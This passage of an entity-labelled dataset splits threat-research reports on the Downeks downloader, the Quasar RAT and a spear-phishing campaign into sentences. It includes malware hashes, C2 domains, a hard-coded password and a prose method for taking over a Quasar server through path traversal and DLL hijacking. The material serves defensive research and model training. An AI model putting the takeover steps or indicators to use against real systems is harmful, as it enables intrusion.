"label": "System"}]} {"text": "The initial infection vector in this attack is not clear , but it results in installing the \u201c Downeks \u201d downloader , which in turn infects the victim computer with the \u201c Quasar \u201d RAT .", "spans": [{"start": 94, "end": 101, "label": "Malware"}, {"start": 170, "end": 176, "label": "Malware"}, {"start": 179, "end": 182, "label": "System"}]} {"text": "Downeks uses third party websites to determine the external IP of the victim machine , possibly to determine victim location with GeoIP .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 13, "end": 33, "label": "System"}, {"start": 130, "end": 135, "label": "System"}]} {"text": "It also drops decoy documents in an attempt to camouflage the attack .", "spans": []} {"text": "Quasar is a .NET Framework-based open-source RAT .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 16, "label": "System"}, {"start": 45, "end": 48, "label": "System"}]} {"text": "The attackers invested significant effort in attempting to hide the tool by changing the source code of the RAT and the RAT server , and by using an obfuscator and packer .", "spans": [{"start": 108, "end": 111, "label": "System"}, {"start": 120, "end": 123, "label": "System"}]} {"text": "Unit 42 researchers observed the Quasar RA being prevented from executing on a Traps-protected client in September 2016 .", "spans": [{"start": 33, "end": 42, "label": "System"}]} {"text": "We observed these Quasar samples :", "spans": [{"start": 18, "end": 24, "label": "Malware"}]} {"text": "f-secure.exe : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f connects to hnoor.newphoneapp.com .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 15, "end": 79, "label": "Indicator"}, {"start": 92, "end": 113, "label": "Indicator"}]} {"text": "HD_Audio.exe : 0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a connects to manual.newphoneapp.com .", "spans": 
[{"start": 0, "end": 12, "label": "Indicator"}, {"start": 15, "end": 79, "label": "Indicator"}, {"start": 92, "end": 114, "label": "Indicator"}]} {"text": "HD_Audio.exe : 86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 crashes upon execution . sim.exe 723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42 connects to hnoor.newphoneapp.com .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 15, "end": 79, "label": "Indicator"}, {"start": 105, "end": 112, "label": "Indicator"}, {"start": 113, "end": 177, "label": "Indicator"}, {"start": 190, "end": 211, "label": "Indicator"}]} {"text": "Further research found other Quasar examples , an attack earlier in the month 2016 on the same target :", "spans": [{"start": 29, "end": 35, "label": "Malware"}]} {"text": "SHA256 : 1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "We found the same Quasar code in an additional attack on the same day , but upon a different target .", "spans": [{"start": 18, "end": 24, "label": "Malware"}]} {"text": "A second Quasar sample was also observed attacking this new victim :", "spans": [{"start": 9, "end": 15, "label": "Malware"}]} {"text": "SHA256 : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "We do not have detailed visibility into the specific host attacked , and have not been able to reproduce the second stage of the attack in our lab .", "spans": []} {"text": "However , based upon the timeframe of subsequent telemetry we observe , we understand the attack chain as follows :", "spans": []} {"text": "The initial dropper ( which varies across attacks ) is delivered to the victim via email or web :", "spans": [{"start": 83, "end": 88, "label": "System"}]} {"text": "File Name : Joint Ministerial Council between the GCC and the EU Council.exe \u201d .", "spans": [{"start": 
12, "end": 76, "label": "Indicator"}]} {"text": "SHA256 0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]} {"text": "The initial dropper , upon execution , extracts an embedded Downeks instance :", "spans": [{"start": 60, "end": 67, "label": "Malware"}]} {"text": "File Name : ati.exe .", "spans": [{"start": 12, "end": 19, "label": "Indicator"}]} {"text": "SHA256 f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]} {"text": "Downeks makes a POST request to dw.downloadtesting.com , resulting in the installation of the Quasar RAT on the victim machine .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 32, "end": 54, "label": "Indicator"}, {"start": 94, "end": 100, "label": "Malware"}, {"start": 101, "end": 104, "label": "System"}]} {"text": "Additional Downeks downloaders connecting to the previously-observed server dw.downloadtesting.com were also found in this attack :", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 49, "end": 75, "label": "System"}, {"start": 76, "end": 98, "label": "Indicator"}]} {"text": "SHA256 15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]} {"text": "SHA256 9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740 .", "spans": [{"start": 7, "end": 71, "label": "Indicator"}]} {"text": "Further research identified dozens of Dowenks and Quasar samples related to these attackers .", "spans": [{"start": 38, "end": 45, "label": "Malware"}, {"start": 50, "end": 56, "label": "Malware"}]} {"text": "All included decoy document written in Arabic ( all related to Middle Eastern politics ) or Hebrew .", "spans": [{"start": 13, "end": 27, "label": "System"}]} {"text": "Most of them use the same mutex structure , share the same fake icon and unique metadata details , file writes , registry 
operations , and fake common program metadata , as seen in DustySky samples .", "spans": [{"start": 26, "end": 31, "label": "System"}]} {"text": "The Downeks downloader and Quasar C2 infrastructures are each self-contained and independent of each other .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 34, "end": 36, "label": "System"}]} {"text": "However , we did find a single shared IP address demonstrably connecting the Downeks downloader and Quasar C2 infrastructure .", "spans": [{"start": 38, "end": 40, "label": "Indicator"}, {"start": 77, "end": 84, "label": "Malware"}, {"start": 100, "end": 106, "label": "Malware"}, {"start": 107, "end": 109, "label": "System"}]} {"text": "We saw five samples built on the same date in December 2015 , and six on the same date in January , further solidifying the link between each sample .", "spans": []} {"text": "We analyzed a Quasar sample we found that was communicating with an active C2 server at the time of analysis :", "spans": [{"start": 14, "end": 20, "label": "Malware"}, {"start": 75, "end": 77, "label": "System"}]} {"text": "SHA256 : 4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "Quasar is a publicly-available commodity RAT , an evolution of his earlier xRAT , by German developer \u201c MaxXor \u201d .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 41, "end": 44, "label": "System"}, {"start": 75, "end": 79, "label": "System"}]} {"text": "This sample is a modified version of Quasar , most likely forked from open source version 1.2.0.0 on GitHub .", "spans": [{"start": 37, "end": 43, "label": "Malware"}]} {"text": "The client was likely built using the Quasar server client builder .", "spans": [{"start": 38, "end": 44, "label": "Malware"}]} {"text": "We observed the following customizations :", "spans": []} {"text": "C2 server : app.progsupdate.com 
, which resolved to 185.141.25.68 ) , over port 4664 .", "spans": [{"start": 0, "end": 2, "label": "System"}, {"start": 12, "end": 31, "label": "Indicator"}, {"start": 52, "end": 65, "label": "Indicator"}]} {"text": "Quasar mutex name : VMFvdCsC7RFqerZinfV0sxJFo .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 20, "end": 45, "label": "Indicator"}]} {"text": "Keylogger log location : Users\\hJTQwqwwSCkZU\\AppData\\Roaming\\GoogleDesktop\\ .", "spans": []} {"text": "The malware uses fake version information to appear as a Microsoft update program , as well as Google Desktop once unpacked .", "spans": [{"start": 17, "end": 41, "label": "System"}, {"start": 57, "end": 66, "label": "Organization"}, {"start": 95, "end": 123, "label": "System"}]} {"text": "This sample is packed by \u201c Netz \u201d , a simple .NET Framework packer which stores the original executable compressed ( zlib ) as a resource .", "spans": [{"start": 27, "end": 31, "label": "System"}, {"start": 45, "end": 49, "label": "System"}]} {"text": "At runtime , the packer decompresses the resource and uses Reflection to load the assembly , find its Entry point , and Invoke it .", "spans": []} {"text": "Extracting the payload is straight forward \u2013 we simply dump the resource and decompress it .", "spans": []} {"text": "We discovered that the sample was obfuscated using .NET reactor .", "spans": [{"start": 19, "end": 29, "label": "Indicator"}, {"start": 34, "end": 44, "label": "System"}, {"start": 51, "end": 63, "label": "System"}]} {"text": "It is possible to decompile the deobfuscated sample and retrieve most of the original source code but not enough to compile it easily .", "spans": []} {"text": "After deobfuscation we extracted :", "spans": [{"start": 6, "end": 19, "label": "System"}]} {"text": "SHA256 : d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "After decompiling the sample , we were 
able to document the modifications from the open-source Quasar .", "spans": [{"start": 95, "end": 101, "label": "Malware"}]} {"text": "The configuration of Quasar is stored in the Settings object , which is encrypted with a password which is itself stored unencrypted .", "spans": [{"start": 21, "end": 27, "label": "Malware"}]} {"text": "Modifications :", "spans": []} {"text": "The ISCHECKIP and INSTARTUPFOLDER are not found in open source Quasar samples .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 18, "end": 33, "label": "Malware"}, {"start": 63, "end": 69, "label": "Malware"}]} {"text": "The sample we analyzed is using RijndaelManaged with ECB mode and PKCS7 padding .", "spans": []} {"text": "The key is the SHA256 hash of the hard-coded password .", "spans": []} {"text": "The password of the sample we analyzed is : \u201c 6y7u^Y&U6y7u^Y&U6y7u^Y&U \u201d .", "spans": []} {"text": "Although at first glance this appears somewhat complex , it is in fact a rather simple , repeated keyboard sequence .", "spans": []} {"text": "We observe similar keyboard patterns in other samples : \u201c 567%^& \u201d , \u201c zxc!@#ASD \u201d .", "spans": []} {"text": "Modifications :", "spans": []} {"text": "Uses SHA256 instead of MD5 to create the key .", "spans": []} {"text": "Uses RijndaelManaged instead of AES for encryption . 
( with ECB mode , which is considered weak ) .", "spans": []} {"text": "Quasar contains the NetSerializer library that handles serialization of high level IPacket objects that the client and server use to communicate .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 20, "end": 41, "label": "System"}, {"start": 108, "end": 125, "label": "System"}]} {"text": "The serialization assigns unique IDs for serializable objects types .", "spans": []} {"text": "The open source and several other samples we found give a dynamically-assigned 1 byte ID at compile time .", "spans": []} {"text": "The sample we analyzed changed that behavior and hard-coded DWORD for each object type .", "spans": []} {"text": "This is a better implementation , as it allows servers and clients from different versions to communicate with each other to some extent .", "spans": []} {"text": "The sample we analyzed is most likely forked from open source quasar 1.2.0.0 .", "spans": [{"start": 62, "end": 76, "label": "Malware"}]} {"text": "We find multiple file/object names hinting at the version , but must compelling :", "spans": []} {"text": "Quasar version 1.1.0.0 names the encryption module name space \u201c Encryption \u201d , while subsequent Quasar versions use \u201c Cryptography \u201d \u2013 which we observe in this sample .", "spans": [{"start": 0, "end": 22, "label": "Malware"}, {"start": 96, "end": 111, "label": "Malware"}]} {"text": "Quasar version 1.3.0.0 changed the encryption key generation , and stopped saving the password in the sample .", "spans": [{"start": 0, "end": 22, "label": "Malware"}]} {"text": "There are more indications as well , such as names of objects , files etc .", "spans": []} {"text": "Other samples we analyzed had different combinations of modification to cryptography and serialization .", "spans": []} {"text": "Our decompilation of the serialization library was not complete enough to allow simple recompilation .", "spans": [{"start": 25, "end": 46, 
"label": "System"}]} {"text": "Instead , we downloaded and compiled the 1.2.0.0 server of the open-source Quasar RAT , having determined that this seemed likely the most similar version .", "spans": [{"start": 75, "end": 85, "label": "Malware"}]} {"text": "The out-of-the-box server could not communicate with the client sample owing to the previously documented modifications that we had observed .", "spans": [{"start": 4, "end": 25, "label": "System"}]} {"text": "We incorporated those changes into our build , discovering that this worked for most sample versions with almost no further modification .", "spans": []} {"text": "Both the client and the server use the same code to serialize and encrypt the communications .", "spans": [{"start": 24, "end": 30, "label": "System"}]} {"text": "Instead of compiling a different server for each client , our server uses the code from within the client to communicate with it .", "spans": [{"start": 33, "end": 39, "label": "System"}, {"start": 58, "end": 68, "label": "System"}]} {"text": "Using Reflection , the server can load the assembly of the client to find the relevant functions and passwords .", "spans": [{"start": 23, "end": 29, "label": "System"}]} {"text": "This was more complex .", "spans": []} {"text": "Both the client and server uses the same API , but the client serializer cannot serialize server objects , because they are not the same as their \u201c mirrored \u201d objects inside the client .", "spans": []} {"text": "In some cases these objects are completely different , for example the server commands to get the file system .", "spans": []} {"text": "Our solution is to :", "spans": []} {"text": "Translate on the fly the objects the server send to mirrored matching client objects ( will not work if client doesn\u2019t have this object , or renamed it ) .", "spans": []} {"text": "Copy the content from the server object into the new client object ( will not work if client implementation is different ) .", "spans": []} 
{"text": "Serialize the client object ( which will be later encrypted and sent ) .", "spans": []} {"text": "Deserialize the decrypted response into another client response object .", "spans": []} {"text": "Translate the client response object into the server version of the client response object .", "spans": []} {"text": "Copy the contents from the client response object into the translated server object .", "spans": []} {"text": "Return the translated object .", "spans": []} {"text": "Our sample communicates with app.progsupdate.com , which resolved to 185.141.25.68 , over TCP port 4664 .", "spans": [{"start": 29, "end": 48, "label": "Indicator"}, {"start": 69, "end": 82, "label": "Indicator"}, {"start": 90, "end": 93, "label": "Indicator"}]} {"text": "The server sends a command . for example , \u201c Get System Information \u201d .", "spans": [{"start": 45, "end": 67, "label": "Indicator"}]} {"text": "The command is translated to an IPacket of type GetSystemInfo .", "spans": []} {"text": "The packet is serialized into a stream of bytes .", "spans": []} {"text": "The stream of bytes is encrypted ( in some versions there is also optional compression step ) .", "spans": []} {"text": "The stream of bytes is sent over TCP to the client .", "spans": [{"start": 33, "end": 36, "label": "Indicator"}]} {"text": "The client receives and decrypts the packet .", "spans": []} {"text": "The client deserializes the packet into IPacket GetSystemInfo .", "spans": []} {"text": "The relevant handler of the client is called , collects the system information and sends it back inside IPacket of GetSystemInfoResponse .", "spans": []} {"text": "Each of these layers seems to be different to some extent in the various samples we found .", "spans": []} {"text": "The IPacket , Serialization and Encryption framework code is shared between the client and the server , therefore we can use it with Reflection .", "spans": []} {"text": "However the Server handlers and command function are not , so 
we cannot create a completely perfect simulation .", "spans": []} {"text": "The attacker can issue commands ( not all commands appear in different samples ) through the Quasar server GUI for each client :", "spans": [{"start": 93, "end": 110, "label": "System"}]} {"text": "Get system information .", "spans": []} {"text": "Get file system .", "spans": []} {"text": "Upload / download / execute files .", "spans": []} {"text": "Startup manager .", "spans": []} {"text": "Open task manager .", "spans": []} {"text": "Kill / start processes .", "spans": []} {"text": "Edit registry .", "spans": []} {"text": "Reverse Proxy .", "spans": []} {"text": "Shutdown / restart the computer .", "spans": []} {"text": "Open remote desktop connection .", "spans": []} {"text": "Observe the desktop and actions of active user .", "spans": []} {"text": "Issue remote mouse clicks and keyboard strokes .", "spans": []} {"text": "Password stealing .", "spans": []} {"text": "Retrieve Keylogger logs .", "spans": []} {"text": "Visit website .", "spans": []} {"text": "Display a message box .", "spans": []} {"text": "The file system commands underling handlers and IPacket were modified to support more features , so these commands don\u2019t work out of the box and required manual implementation from us .", "spans": [{"start": 4, "end": 15, "label": "System"}]} {"text": "With further analysis of the Quasar RAT C2 Server , we uncovered vulnerabilities in the server code , which would allow remote code execution .", "spans": [{"start": 29, "end": 39, "label": "Malware"}, {"start": 40, "end": 42, "label": "System"}]} {"text": "This might allow a second attacker to install code of their choice \u2013 for example , their own Quasar RAT \u2013 on the original attacker \u2019s server .", "spans": [{"start": 93, "end": 103, "label": "Malware"}]} {"text": "We refer to this ( somewhat ironic ) technique as a \u201c Double Edged Sword Attack \u201d .", "spans": []} {"text": "We did not apply this to any live C2 
servers \u2013 we only tested this with our own servers in our lab .", "spans": [{"start": 34, "end": 36, "label": "System"}]} {"text": "In the lab , we changed our Quasar RAT source code to use the known encryption key , and to send fake victim IP address , City , Country code , Flag , and Username .", "spans": [{"start": 28, "end": 38, "label": "Malware"}, {"start": 109, "end": 111, "label": "Indicator"}]} {"text": "The Quasar serve does not verify the RAT data , and displays this data in the RAT Server GUI when the RAT is executed and connects to the server .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 37, "end": 40, "label": "System"}, {"start": 78, "end": 81, "label": "System"}, {"start": 102, "end": 105, "label": "System"}]} {"text": "We found this could be used to supply compelling \u201c victim data \u201d to convince the attacker to connect to this \u201c victim \u201d via the GUI .", "spans": []} {"text": "Quasar serve includes a File Manager window , allowing the attacker to select victim files , and trigger file operations \u2013 for example , uploading a file from victim machine to server .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 24, "end": 43, "label": "System"}]} {"text": "Uploaded files are written to the server sub directory \u201c clients\\user_name@machine_name_ipaddress \u201d .", "spans": [{"start": 57, "end": 97, "label": "Indicator"}]} {"text": "Quasar serve does not verify that the size , filename , extension , or header of the uploaded file is the same as requested .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]} {"text": "Therefore , if we convince the attacker to request the file \u201c secret_info.doc ( 20KB ) \u201d , we can instead return to the server any file of our choice , of any size or type .", "spans": [{"start": 62, "end": 77, "label": "Indicator"}, {"start": 80, "end": 84, "label": "Indicator"}]} {"text": "When the Quasar serve retrieves the name of the uploaded file 
from the victim , it does not verify that it is a valid file path .", "spans": [{"start": 9, "end": 15, "label": "Malware"}]} {"text": "Therefore sending the file path \u201c ..\\..\\ secret_info.doc \u201d", "spans": [{"start": 34, "end": 56, "label": "Indicator"}]} {"text": "will result in writing our file instead to the same directory as the Quasar serve code .", "spans": [{"start": 69, "end": 75, "label": "Malware"}]} {"text": "Quasar serve does not even verify that a file was requested from the victim .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]} {"text": "Immediately when the File Manager window is opened by the attacker , the Quasar serve sends two commands to the RAT : GetDrives and listDirectory ( to populate the list of the victim \u2019s files in the RAT Server GUI ) .", "spans": [{"start": 17, "end": 40, "label": "System"}, {"start": 73, "end": 79, "label": "Malware"}, {"start": 112, "end": 115, "label": "System"}, {"start": 199, "end": 213, "label": "System"}]} {"text": "We can respond to those commands by instead sending two files of our choice to the Quasar serve .", "spans": [{"start": 83, "end": 89, "label": "Malware"}]} {"text": "Again , we control the content of the file , the size and the path and filename .", "spans": []} {"text": "Quasar is a .NET Framework assembly , loading multiple DLLs upon launch , for example \u201c dnsapi.dll \u201d .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 12, "end": 26, "label": "System"}, {"start": 88, "end": 98, "label": "Indicator"}]} {"text": "Quasar serve is vulnerable to a simple DLL hijacking attack , by using this technique to replace server DLLs .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 39, "end": 42, "label": "System"}]} {"text": "When the attacker restarts the Quasar application , our uploaded \u201c dnsapi.dll \u201d will instead be loaded .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 67, "end": 77, "label": 
"Indicator"}]} {"text": "Through this vector , we could drop our own Quasar clien on the attacker \u2019s server and execute it .", "spans": [{"start": 44, "end": 50, "label": "Malware"}]} {"text": "Our Quasar RAT will connect to our own ( secured , of course ) Quasar serve , allowing us to control that attacker \u2019s server with his own RAT .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 63, "end": 69, "label": "Malware"}, {"start": 138, "end": 141, "label": "System"}]} {"text": "We can also replace \u201c shfolder.dll \u201d ( and add a DLL export proxy to avoid a crash ) , which is loaded whenever the attacker clicks the builder tab \u2013 allowing us to infect the server while it runs , without the need to wait for application restart .", "spans": [{"start": 22, "end": 34, "label": "Indicator"}, {"start": 49, "end": 52, "label": "System"}]} {"text": "Although Downeks has been publicly examined to some extent , our analysis found several features not previously described .", "spans": [{"start": 9, "end": 16, "label": "Malware"}]} {"text": "Earlier Downeks samples were all written in native code .", "spans": [{"start": 8, "end": 15, "label": "Malware"}]} {"text": "However , among our Downeks samples , we found new versions apparently written in .NET .", "spans": [{"start": 20, "end": 27, "label": "Malware"}, {"start": 82, "end": 86, "label": "System"}]} {"text": "We observe many behavioral similarities and unique strings across both the native-Downeks versions , and the new .NET Downeks versions .", "spans": [{"start": 75, "end": 89, "label": "Malware"}, {"start": 113, "end": 117, "label": "System"}]} {"text": "Almost all of the strings and behaviors we describe in this analysis of a .NET version are also present in the native version .", "spans": [{"start": 74, "end": 78, "label": "System"}]} {"text": "We observed these samples deployed only against Hebrew-speaking targets .", "spans": []} {"text": "Downeks .NET internal name is \u201c 
SharpDownloader \u201d , \u201c Sharp \u201d may be a reference to the language it was written in \u2013 C# .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 32, "end": 47, "label": "Malware"}, {"start": 117, "end": 119, "label": "System"}]} {"text": "As seen in previous Downeks versions , it uses masquerades with icons , filenames and metadata imitating popular legitimate applications such as VMware workstation and CCleaner , or common file formats such as DOC and PDF .", "spans": [{"start": 20, "end": 27, "label": "Malware"}, {"start": 47, "end": 69, "label": "System"}, {"start": 72, "end": 81, "label": "System"}, {"start": 86, "end": 136, "label": "System"}, {"start": 145, "end": 163, "label": "System"}, {"start": 168, "end": 176, "label": "System"}, {"start": 210, "end": 213, "label": "System"}, {"start": 218, "end": 221, "label": "System"}]} {"text": "All 3 samples were compiled with the same timestamp .", "spans": []} {"text": "Downeks.NET is obfuscated using \u201c Yano \u201d and can be easily de-obfuscated using the de4dot utility .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 34, "end": 38, "label": "System"}, {"start": 79, "end": 97, "label": "System"}]} {"text": "SHA256 : 4dcf5bd2c7a5822831d9f22f46bd2369c4c9df17cc99eb29975b5e8ae7e88606 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "SHA256 : 905f6a62749ca6f0fd33345d6a8b1831d87e9fd1f81a59cd3add82643b367693 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "SHA256 : c885f09b10feb88d7d176fe1a01ed8b480deb42324d2bb825e96fe1408e2a35f .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]} {"text": "Downeks is a backdoor with only very basic capabilities .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]} {"text": "It communicates with the C2 server using HTTP POST requests .", "spans": [{"start": 25, "end": 27, "label": "System"}, {"start": 41, "end": 45, "label": "Indicator"}]} {"text": "It runs in an infinite 
loop , in each iteration it requests a command from the C2 , and then it sleeps for a time period it receives in the C2 response ( defaulting to 1 second if no sleep-time sent ) .", "spans": [{"start": 79, "end": 81, "label": "System"}, {"start": 140, "end": 142, "label": "System"}]} {"text": "The data that is sent in the POST is serialized with json , which is then is encrypted , and finally encoded in base64 .", "spans": [{"start": 53, "end": 57, "label": "System"}]} {"text": "The json format is typically { \u201cmth \u201d :", "spans": [{"start": 4, "end": 8, "label": "System"}]} {"text": "\u201d some_method \u201d , \u201c data \u201d :", "spans": []} {"text": "\u201d some_encrypted_data \u201d } .", "spans": []} {"text": "The C2 S-TOOL server responds using the same format and serialization/encryption/encoding .", "spans": [{"start": 4, "end": 20, "label": "System"}]} {"text": "As described in earlier analyses , Downeks \u2019 main purpose is as a downloader .", "spans": [{"start": 35, "end": 42, "label": "Malware"}]} {"text": "Unfortunately , we were unable to get any C2 S-TOOL servers to issue download commands to any samples that we tested in our lab .", "spans": [{"start": 42, "end": 59, "label": "System"}]} {"text": "The download is initiated upon receiving json with a \u201c download \u201d command , which includes the URL of the file to be downloaded .", "spans": []} {"text": "Downeks can also be instructed to execute binaries that already exist on the victim machine .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]} {"text": "After successful execution , Downeks returns the results to the C2 S-TOOL server .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 64, "end": 80, "label": "System"}]} {"text": "Downeks also has a self-update capability , if instructed by the C2 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 65, "end": 67, "label": "System"}]} {"text": "Downeks can be instructed with the \u201c img 
\u201d command to capture the victim screen and transmit it back to the C2 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 31, "end": 50, "label": "System"}, {"start": 108, "end": 110, "label": "System"}]} {"text": "The parameters \u201c wth \u201d and \u201c qlt \u201d specify \u201c width \u201d and \u201c quality \u201d .", "spans": []} {"text": "Downeks .NET creates a file in the \u201c Appdata \u201d directory , based on certain properties of the machine .", "spans": [{"start": 0, "end": 12, "label": "Malware"}]} {"text": "During our analysis , Downeks created a file in \u201c Appdata\\Roaming \u201d containing only \u201c SD{new line} 0 \u201d ( \u201c SD \u201d possibly for \u201c SharpDownloader \u201d ) .", "spans": [{"start": 22, "end": 29, "label": "Malware"}]} {"text": "Although this file itself is not particularly interesting , the older ( native ) Downeks versions also creates a file in Appdata\\Roaming , with identical data .", "spans": [{"start": 81, "end": 88, "label": "Malware"}, {"start": 121, "end": 136, "label": "System"}]} {"text": "The filenames across the two variants bear striking similarities .", "spans": []} {"text": "The .NET variant creates \u201c 1FABFBFF0000065132F71D94 \u201d , while the native version creates \u201c 000206511FABFBFF \u201d .", "spans": [{"start": 4, "end": 8, "label": "System"}, {"start": 27, "end": 51, "label": "Indicator"}, {"start": 91, "end": 107, "label": "Indicator"}]} {"text": "We observed the string \u201c 1FABFBFF0000065132F71D94 \u201d in memory during debugging of the native variant .", "spans": [{"start": 25, "end": 49, "label": "Indicator"}]} {"text": "This is a pseudo-unique ID for each machine , based on install date taken from the registry , volume serial number , OS version and service pack , Processor architecture , and computer name .", "spans": []} {"text": "Downeks enumerates any antivirus products installed on the victim machine and transmits the list to the C2 .", "spans": 
[{"start": 0, "end": 7, "label": "Malware"}, {"start": 104, "end": 106, "label": "System"}]} {"text": "It constructs this list using the WMI query : \u201cSELECT displayName FROM AntivirusProduct \u201d .", "spans": [{"start": 34, "end": 37, "label": "System"}]} {"text": "Downeks achieves host persistence through either the registry \u201c run \u201d key or with a shortcut in the start-up folder .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 53, "end": 73, "label": "System"}, {"start": 84, "end": 115, "label": "System"}]} {"text": "In another similarity between both variants , Dowenks assesses the victim \u2019s external IP using an HTTP request to .", "spans": [{"start": 46, "end": 53, "label": "Malware"}, {"start": 98, "end": 110, "label": "System"}]} {"text": "com/raw .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}]} {"text": "Downeks can be instructed by the C2 to perform a few other commands :", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 33, "end": 35, "label": "System"}]} {"text": "Check if the computer name and user name , or external IP address , is in a provided list and if so , display a message box with a message as defined by the C2 .", "spans": [{"start": 55, "end": 57, "label": "Indicator"}, {"start": 157, "end": 159, "label": "System"}]} {"text": "Kill any running process and attempt to delete the associated executable . 
\u201c Setup \u201d command \u2013 sends various info about the machine with each iteration of the C2 communications loop .", "spans": [{"start": 159, "end": 161, "label": "System"}]} {"text": "Downeks has static encryption keys hardcoded in the code .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]} {"text": "Palo Alto Networks customers are protected from Downeks and Quasar used in this attack :", "spans": [{"start": 0, "end": 18, "label": "Organization"}, {"start": 48, "end": 55, "label": "Malware"}, {"start": 60, "end": 66, "label": "Malware"}]} {"text": "WildFire properly classifies these Downeks and Quasar samples as malicious .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 35, "end": 42, "label": "Malware"}, {"start": 47, "end": 53, "label": "Malware"}]} {"text": "Traps detects and blocks malicious behavior exhibited by new , unknown Quasar samples .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 71, "end": 77, "label": "Malware"}]} {"text": "C2 servers associated with this activity are blocked through Threat Prevention DNS signatures .", "spans": [{"start": 0, "end": 2, "label": "System"}, {"start": 3, "end": 10, "label": "System"}, {"start": 79, "end": 82, "label": "Indicator"}]} {"text": "URI TERROR ATTACK & KASHMIR PROTEST THEMED SPEAR PHISHING emails TARGETING INDIAN EMBASSIES AND INDIAN MINISTRY OF EXTERNAL AFFAIRS - CYSINFO .", "spans": [{"start": 58, "end": 64, "label": "System"}, {"start": 75, "end": 91, "label": "Organization"}, {"start": 96, "end": 131, "label": "Organization"}]} {"text": "In my previous blog I posted details of a cyber attack targeting Indian government organizations .", "spans": [{"start": 65, "end": 96, "label": "Organization"}]} {"text": "This blog post describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear phishing email to target officials in the Indian Embassies and Indian Ministry of External Affairs ( MEA ) .", "spans": 
[{"start": 134, "end": 139, "label": "System"}, {"start": 167, "end": 183, "label": "Organization"}, {"start": 188, "end": 223, "label": "Organization"}, {"start": 226, "end": 229, "label": "Organization"}]} {"text": "In order to infect the victims , the attackers distributed spear-phishing emails containing malicious word document which dropped a malware capable of spying on infected systems .", "spans": [{"start": 74, "end": 80, "label": "System"}, {"start": 92, "end": 106, "label": "System"}]} {"text": "The email purported to have been sent from legitimate email ids .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 54, "end": 59, "label": "System"}]} {"text": "The attackers spoofed the email ids associated with Indian Ministry of Home Affairs to send out email to the victims .", "spans": [{"start": 26, "end": 31, "label": "System"}, {"start": 52, "end": 83, "label": "Organization"}, {"start": 96, "end": 101, "label": "System"}]} {"text": "Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the signature of the email , this is to make it look like the email was sent by a high-ranking Government official associated with Ministry of Home Affairs ( MHA ) .", "spans": [{"start": 24, "end": 56, "label": "System"}, {"start": 73, "end": 97, "label": "Organization"}, {"start": 122, "end": 127, "label": "System"}, {"start": 163, "end": 168, "label": "System"}, {"start": 232, "end": 256, "label": "Organization"}, {"start": 259, "end": 262, "label": "Organization"}]} {"text": "In the The first wave of attack , The attackers spoofed an email id that is associated with Indian Ministry of Home Affairs ( MHA ) and an email was sent on September 20th , 2016 ( just 2 days after the Uri terror attack ) to an email id associated with the Indian Embassy in Japan .", "spans": [{"start": 59, "end": 64, "label": "System"}, {"start": 99, "end": 123, "label": "Organization"}, {"start": 126, "end": 129, "label": 
